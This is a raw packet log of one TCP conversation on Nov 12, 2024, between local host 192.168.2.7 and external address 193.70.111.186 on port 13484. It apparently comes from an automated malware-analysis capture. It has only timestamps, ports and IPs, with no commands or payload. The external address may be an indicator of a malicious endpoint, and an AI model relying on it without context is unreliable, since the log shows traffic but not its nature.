Nov 12, 2024 18:45:31.998697042 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:31.998708963 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:31.998745918 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.040622950 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.040756941 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.088615894 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.088690996 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.136662006 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.136847019 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.184695005 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.184756994 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.232567072 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.232621908 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.259948015 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.260230064 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265249014 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265299082 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265321016 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265327930 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265331984 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265350103 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265357018 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265382051 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265393019 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265402079 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265403032 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265415907 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265460968 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265472889 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265484095 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265494108 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265506029 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265515089 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265521049 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265527010 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265551090 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265561104 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265564919 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265575886 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265614033 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265614033 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265625000 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265669107 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265763044 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265772104 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265784979 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265815020 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265842915 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.265850067 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265861034 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265870094 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265878916 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.265937090 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.266290903 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.266300917 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.266352892 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.270729065 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.270746946 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.270860910 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.270869970 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.270912886 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.270942926 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.270983934 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.270994902 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.271505117 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.271596909 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.271691084 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.271771908 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.271825075 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.271843910 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.271853924 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.271862984 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.271893024 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.271908998 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272021055 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272038937 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272047997 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272057056 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272080898 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272105932 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272116899 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272126913 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272135973 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272145987 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272186041 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272193909 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272200108 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272238970 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272243977 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272253990 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272294044 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272746086 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272756100 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272766113 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272774935 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272783995 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272792101 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272802114 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272810936 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272815943 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272821903 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272830963 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272841930 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272850990 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272860050 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272869110 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272876978 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272885084 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272887945 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272897959 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272905111 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272907972 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272917986 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272927046 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272934914 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272944927 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272965908 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272974968 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272979021 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.272986889 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.272995949 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273005009 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273014069 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273017883 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.273025036 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273035049 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273044109 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273052931 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273053885 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.273062944 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273072958 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273083925 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.273108006 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.273124933 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.273130894 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273140907 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273149967 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273178101 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273185968 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273195028 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273201942 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.273204088 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.273233891 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.273248911 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.275963068 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276077986 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276133060 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276141882 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276151896 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276201010 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276211023 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276222944 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276232958 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276242971 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276252031 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276268005 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276276112 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276300907 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276335955 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276352882 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276362896 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276364088 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276381016 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276448011 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276503086 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276541948 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276586056 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276608944 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276670933 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276680946 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276690006 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276690006 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276700974 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276712894 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276714087 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276746035 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276758909 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276772976 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276786089 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276791096 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276794910 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276833057 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276834965 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276845932 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276868105 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276880026 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276926041 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.276946068 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276958942 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.276968956 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277000904 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277028084 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277043104 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277051926 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277100086 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277110100 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277144909 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277168036 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277179956 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277189016 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277199030 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277206898 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277215958 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277224064 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277255058 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277271032 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277293921 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277302980 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277307034 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277311087 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277314901 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277396917 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277405977 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277497053 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277507067 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277515888 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277515888 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277544975 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277564049 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277582884 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277592897 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277601957 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277612925 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277621984 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277638912 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277666092 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277683020 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277776003 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277785063 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277801991 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277825117 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277854919 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277868032 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277879953 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277903080 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277911901 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277920961 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277930975 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.277950048 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.277972937 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278080940 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278091908 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278100967 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278110027 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278119087 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278127909 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278145075 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278146029 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278166056 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278181076 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278198957 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278223038 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278450966 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278480053 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278491020 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278493881 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278527021 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278538942 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278582096 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278593063 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278601885 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278609991 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278619051 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278657913 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278685093 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278693914 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278702974 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278714895 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278724909 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278733015 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278760910 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278775930 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278795958 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278805971 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278815031 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278824091 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278846979 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278892994 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.278969049 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278978109 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278986931 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.278995991 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279038906 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.279062033 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.279077053 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279087067 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279097080 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279104948 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279131889 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.279150963 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.279702902 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279711962 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279721022 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279731989 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279741049 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279762983 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.279784918 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.279870987 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279880047 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279884100 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279891968 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279901028 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279910088 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279921055 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279944897 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.279972076 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.279985905 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.279995918 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280020952 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280029058 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280070066 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280118942 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280127048 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280131102 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280153036 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280155897 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280164957 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280329943 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280339003 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280348063 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280356884 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280366898 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280375957 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280375004 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280419111 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280422926 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280430079 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280438900 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280447960 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280457020 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280464888 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280503035 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280528069 CET	13484	49790	193.70.111.186	192.168.2.7
